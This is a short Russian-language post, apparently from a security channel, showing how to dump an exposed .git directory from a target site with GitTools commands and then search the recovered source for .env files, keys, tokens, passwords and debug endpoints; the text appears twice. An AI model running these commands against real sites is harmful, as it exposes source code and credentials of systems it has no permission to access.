🕷 Получаем исходники через открытую директорию .git
Ситуация: на таргете доступны служебные файлы Git ⬇️
https://sub.target.com/app/.git/index
https://sub.target.com/app/.git/HEAD
https://sub.target.com/app/.git/config
На первый взгляд — просто несколько файлов. На практике этого может хватить, чтобы восстановить исходники приложения.
Самый простой путь — использовать GitTools:
bash gitdumper.sh https://sub.target.com/app/.git/ dest-dir
bash extractor.sh dest-dir dest-dir-dump
gitdumper скачает содержимое .git, а extractor попробует восстановить рабочее дерево проекта.
После восстановления проверь:
▪️ конфиги и .env,
▪️ API эндпоинты,
▪️ внутренние домены,
▪️ ключи, токены и пароли,
▪️ старые коммиты,
▪️ dev/staging-настройки,
▪️ закомментированный код и debug-ручки.
🔥 Канал в МАХ
Ситуация: на таргете доступны служебные файлы Git ⬇️
https://sub.target.com/app/.git/index
https://sub.target.com/app/.git/HEAD
https://sub.target.com/app/.git/config
На первый взгляд — просто несколько файлов. На практике этого может хватить, чтобы восстановить исходники приложения.
Самый простой путь — использовать GitTools:
bash gitdumper.sh https://sub.target.com/app/.git/ dest-dir
bash extractor.sh dest-dir dest-dir-dump
gitdumper скачает содержимое .git, а extractor попробует восстановить рабочее дерево проекта.
После восстановления проверь:
▪️ конфиги и .env,
▪️ API эндпоинты,
▪️ внутренние домены,
▪️ ключи, токены и пароли,
▪️ старые коммиты,
▪️ dev/staging-настройки,
▪️ закомментированный код и debug-ручки.
🔥 Канал в МАХ